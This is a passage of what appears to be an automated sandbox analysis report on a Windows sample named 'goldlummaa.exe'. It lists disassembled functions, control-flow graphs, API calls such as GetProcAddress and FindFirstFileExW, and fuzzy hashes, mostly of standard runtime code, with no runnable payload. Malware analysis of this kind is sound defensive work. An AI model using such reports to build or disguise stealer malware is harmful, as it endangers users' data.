                                                                                                                  • GetLastError.KERNEL32(?,?,00C6B3A9,?,00000000,?,?,00C6B2C5,?,00000007,?,?,00C6B8DE,?,?), ref: 00C6A85C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 485612231-0
                                                                                                                  • Opcode ID: e678d4a6a9fdd0b85a4b8abe5dfbb76f0513094f1b0e85067ed5cc746ce0cd41
                                                                                                                  • Instruction ID: 3f9e57e8de5928e780eefcaa08bde855ba0869d633f019549c35b7efa22c93e5
                                                                                                                  • Opcode Fuzzy Hash: e678d4a6a9fdd0b85a4b8abe5dfbb76f0513094f1b0e85067ed5cc746ce0cd41
                                                                                                                  • Instruction Fuzzy Hash: 0CE08C32140204ABCB212FE0EC4DB9D7A68EB44351F004021F71CA70A0CA70CEA4CB8B

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 301 c6a649-c6a66b 302 c6a671-c6a683 GetCPInfo 301->302 303 c6a77d-c6a7a3 301->303 302->303 305 c6a689-c6a690 302->305 304 c6a7a8-c6a7ad 303->304 306 c6a7b7-c6a7bd 304->306 307 c6a7af-c6a7b5 304->307 308 c6a692-c6a69c 305->308 310 c6a7bf-c6a7c2 306->310 311 c6a7c9 306->311 309 c6a7c5-c6a7c7 307->309 308->308 312 c6a69e-c6a6b1 308->312 313 c6a7cb-c6a7dd 309->313 310->309 311->313 314 c6a6d2-c6a6d4 312->314 313->304 317 c6a7df-c6a7ed call c63c8e 313->317 315 c6a6d6-c6a70d call c6b45d call c6d4dc 314->315 316 c6a6b3-c6a6ba 314->316 327 c6a712-c6a740 call c6d4dc 315->327 320 c6a6c9-c6a6cb 316->320 323 c6a6bc-c6a6be 320->323 324 c6a6cd-c6a6d0 320->324 323->324 326 c6a6c0-c6a6c8 323->326 324->314 326->320 330 c6a742-c6a74d 327->330 331 c6a74f-c6a759 330->331 332 c6a75b-c6a75e 330->332 333 c6a76e-c6a779 331->333 334 c6a760-c6a76a 332->334 335 c6a76c 332->335 333->330 336 c6a77b 333->336 334->333 335->333 336->317
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(00000083,?,00000005,00C6A4CA,?), ref: 00C6A67B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1807457897-0
                                                                                                                  • Opcode ID: 874f639a6943252c90ec47a9a931054ca21656c4a4705159b91acf57c53aa655
                                                                                                                  • Instruction ID: 98a05fad8caa29cd28c9005d126e8b8a91085f7a45edbcdb5d941c6e31f30c89
                                                                                                                  • Opcode Fuzzy Hash: 874f639a6943252c90ec47a9a931054ca21656c4a4705159b91acf57c53aa655
                                                                                                                  • Instruction Fuzzy Hash: 1C5149B1904158AEDB218E29CDC4BF9BBBCEF15304F1401E9E49AE7182D335AE85DF61

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 337 c632d0-c63374 call c63400 call c635a0 call c667f4 344 c63379-c6338d 337->344 346 c63393-c6339b call c635c0 344->346 347 c633a0-c633b8 call c63e7f 344->347 352 c633bd-c633d5 call c63610 346->352 347->352
                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C633B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2134207285-0
                                                                                                                  • Opcode ID: 66afed5032cb847219c6d62e57d970b0aa3c0db3bd24bcb3dde621d03a6cb893
                                                                                                                  • Instruction ID: 95c5fe07794aed4a3b455cc76fd55cbcaf1fb1b3e56e57c32c78cc058a84cdd3
                                                                                                                  • Opcode Fuzzy Hash: 66afed5032cb847219c6d62e57d970b0aa3c0db3bd24bcb3dde621d03a6cb893
                                                                                                                  • Instruction Fuzzy Hash: 2331C5B5901248CFCB14DFA9C585BAEBBF0FF48314F10816AE815AB361D7759A05CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 355 c69599-c695c3 356 c695c5-c695c7 355->356 357 c695c9-c695cb 355->357 358 c6961a-c6961d 356->358 359 c695d1-c695d8 call c694ce 357->359 360 c695cd-c695cf 357->360 362 c695dd-c695e1 359->362 360->358 363 c695e3-c695f1 GetProcAddress 362->363 364 c69600-c69617 362->364 363->364 365 c695f3-c695fe call c665f7 363->365 366 c69619 364->366 365->366 366->358
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 88c2d79b497a8e76fdb812692ddb1bad94e16166df500ee24726cab211f2c139
                                                                                                                  • Instruction ID: 0f1c780dfe7722d46f191b584f7f5e2b99fce616ec6491b909ca7560185bfb3b
                                                                                                                  • Opcode Fuzzy Hash: 88c2d79b497a8e76fdb812692ddb1bad94e16166df500ee24726cab211f2c139
                                                                                                                  • Instruction Fuzzy Hash: A0019E732046159B9B269E6EECC1B2E33A9FBC13207294125F9198B194DA30D9849695

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 369 c6b3b5-c6b3c1 370 c6b3f3-c6b3fe call c6aec7 369->370 371 c6b3c3-c6b3c5 369->371 378 c6b400-c6b402 370->378 373 c6b3c7-c6b3c8 371->373 374 c6b3de-c6b3ef RtlAllocateHeap 371->374 373->374 375 c6b3f1 374->375 376 c6b3ca-c6b3d1 call c67d70 374->376 375->378 376->370 381 c6b3d3-c6b3dc call c66d13 376->381 381->370 381->374
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C63C34,?,?,00C62442,00001000,?,00C623AA), ref: 00C6B3E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 1911266c64a81d1b2dc78939f59394ec0d3feb4c1adf51b25d2266006014d939
                                                                                                                  • Instruction ID: 16288e36bff457c519bc831a252c44c7bf05ea9bd0918f8e0d69d8cae21eead8
                                                                                                                  • Opcode Fuzzy Hash: 1911266c64a81d1b2dc78939f59394ec0d3feb4c1adf51b25d2266006014d939
                                                                                                                  • Instruction Fuzzy Hash: 8EE06D31345625A7DB312B779C85B6ABA8CEF413A0F150130AD65E63E0DFA4DE8091F2
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExitProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 621844428-0
                                                                                                                  • Opcode ID: 7d28a5908a9373c5db7761fde110b94891e263c4e2f516634d719a86ff7af1be
                                                                                                                  • Instruction ID: 3ae8308502bb3cd4b8bd297261dfbf6c096dc0a8ecf92bda01d0a6e6b17a0edd
                                                                                                                  • Opcode Fuzzy Hash: 7d28a5908a9373c5db7761fde110b94891e263c4e2f516634d719a86ff7af1be
                                                                                                                  • Instruction Fuzzy Hash: 0AE012716152089BD740EF79CC1579E7BE5EF49351F45C438E98DDB344DA34E8808792
                                                                                                                  APIs
                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6C03B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1974802433-0
                                                                                                                  • Opcode ID: 6f82fffb03496b2a28847bd8f8f762fd8548d9994ae496034cf4f2d04aba076e
                                                                                                                  • Instruction ID: 32d7f3d584145d55f497afef2134fa98db052c4f1e0f86b337cf88ddd0a7a708
                                                                                                                  • Opcode Fuzzy Hash: 6f82fffb03496b2a28847bd8f8f762fd8548d9994ae496034cf4f2d04aba076e
                                                                                                                  • Instruction Fuzzy Hash: 4471D1B5905128AFDF30AF68CCC9ABEB7B8AB05300F1441D9E058E7252EB314EC59F11
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C65033
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00C650FF
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C65118
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00C65122
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 254469556-0
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C679C4
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C679CE
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00C679DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3906539128-0
                                                                                                                  APIs
                                                                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00C64844,?,?,?,?,00C64868,000000FF,?,?,?,00C64780,00000000), ref: 00C6490B
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,50496CFE,?,?,00C71B3D,000000FF,?,00C64844,?,?,?,?,00C64868,000000FF,?), ref: 00C6490F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$FileSystem$Precise
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 743729956-0
                                                                                                                  APIs
                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C7149D,?,?,00000008,?,?,00C7106F,00000000), ref: 00C7176F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionRaise
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3997070919-0
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C6524B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2325560087-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00C6AF77: HeapAlloc.KERNEL32(00000008,?,?,?,00C697D4,00000001,00000364,?,00000002,000000FF,?,00C66931,00C78D78,0000000C), ref: 00C6AFB8
                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6C03B
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C6C12F
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C6C16E
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C6C1A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2701053895-0
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000513C,00C64ACD), ref: 00C65020
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 54951025-0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 126821a72a6442578fa07476dabd530d4dcc1109ac11dc68fcd923ef03b2f076
                                                                                                                  • Instruction ID: 52277072fdbc9e4033fd08337c4772c4cb6c93532a6fd81652deab93037b253e
                                                                                                                  • Opcode Fuzzy Hash: 126821a72a6442578fa07476dabd530d4dcc1109ac11dc68fcd923ef03b2f076
                                                                                                                  • Instruction Fuzzy Hash: 59D0923A641A59EFC310CF49E440E41F7B8FB8D670B168166EA0893B20C331FC51CAE0
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(0122FD58,0122FD58,00000000,7FFFFFFF,?,00C6F863,0122FD58,0122FD58,00000000,0122FD58,?,?,?,?,0122FD58,00000000), ref: 00C6F91E
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6F9D9
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6FA68
                                                                                                                  • __freea.LIBCMT ref: 00C6FAB3
                                                                                                                  • __freea.LIBCMT ref: 00C6FAB9
                                                                                                                  • __freea.LIBCMT ref: 00C6FAEF
                                                                                                                  • __freea.LIBCMT ref: 00C6FAF5
                                                                                                                  • __freea.LIBCMT ref: 00C6FB05
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127012223-0
                                                                                                                  • Opcode ID: c31bece3a17abd32fb90115ba4abf8e4fba8167dd61c9aae5abd7350a358ca22
                                                                                                                  • Instruction ID: 5466fdd737a7fbec294c30034ab9932f559b524f08aa4aaa507e130d3be4eaaf
                                                                                                                  • Opcode Fuzzy Hash: c31bece3a17abd32fb90115ba4abf8e4fba8167dd61c9aae5abd7350a358ca22
                                                                                                                  • Instruction Fuzzy Hash: BB71F672A002056BDF319F94ECD1FAE77A59F45314F29007DE924E7282EB318D42D7A0
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65CB7
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C65CBF
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65D48
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C65D73
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65DC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: 901aa07a6c33f52b05f2527f7f30f4ceabd7e9103f20e8f6e6eb28e0ed74c121
                                                                                                                  • Instruction ID: 373f8d96e0cfa2f534a4994ec8ec27b998b9379b347ecedcafd1b45447510522
                                                                                                                  • Opcode Fuzzy Hash: 901aa07a6c33f52b05f2527f7f30f4ceabd7e9103f20e8f6e6eb28e0ed74c121
                                                                                                                  • Instruction Fuzzy Hash: 8141D634A00619ABCF20DF69C8C8A9EBBB5FF45314F248155E9285B392D731EA45CB91
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C648A5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00C648B3
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00C648C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                  • Opcode ID: 725de0535ace42e70d866c806a2998368d53b82af9aadd04fdb858b053643e63
                                                                                                                  • Instruction ID: c575023244e3af06e1f64c284f72b21b2c7b75ff2912846dc0d4a20a6c2e0a62
                                                                                                                  • Opcode Fuzzy Hash: 725de0535ace42e70d866c806a2998368d53b82af9aadd04fdb858b053643e63
                                                                                                                  • Instruction Fuzzy Hash: DBD0C7315C2A209F93509F74BC0EB5E3EA4EA057513018135F71DD2251DBB449888BA0
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00C67F40,00C65A6B,00C65180), ref: 00C67F57
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C67F65
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C67F7E
                                                                                                                  • SetLastError.KERNEL32(00000000,00C67F40,00C65A6B,00C65180), ref: 00C67FD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 0746af6793d4c4ea50815d53d4c77ae68cefbe2b6dbda556134b5fe2a445c8c3
                                                                                                                  • Instruction ID: 8c6b828a2233fa19ceceff4cedcc333e5ad65f3e5283d1a91747523029256573
                                                                                                                  • Opcode Fuzzy Hash: 0746af6793d4c4ea50815d53d4c77ae68cefbe2b6dbda556134b5fe2a445c8c3
                                                                                                                  • Instruction Fuzzy Hash: 2901F73260C2126EA73927F5ACC5F2F37A4DF867B97200B2AF128851F0FF514C86A152
                                                                                                                  APIs
                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00C688F8
                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00C68B71
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2673424686-393685449
                                                                                                                  • Opcode ID: d24bed82c37ff61d3d57c45649abf8b5eae13114d7b6e0bbffdcde5fae6782eb
                                                                                                                  • Instruction ID: bc17f7737182166b46f0cfb2fcaba35794b37869ed93d75e48f587cce775b7ea
                                                                                                                  • Opcode Fuzzy Hash: d24bed82c37ff61d3d57c45649abf8b5eae13114d7b6e0bbffdcde5fae6782eb
                                                                                                                  • Instruction Fuzzy Hash: 8FB18D71800209EFCF38DFA4C8C19AEB7B5FF44314F14465AE9216B252DB31DA5ADB92
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\Desktop\goldlummaa.exe, xrefs: 00C6C2E0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                  • API String ID: 0-3961576614
                                                                                                                  • Opcode ID: 91c58075236d8c9bdba84c591242bf236afa9ab35098e7872cab18f787b76dc4
                                                                                                                  • Instruction ID: bbd70bc84b3756fee1935337d646dad07a49d5d7d6963ba5b2e1b69a7b3d24c4
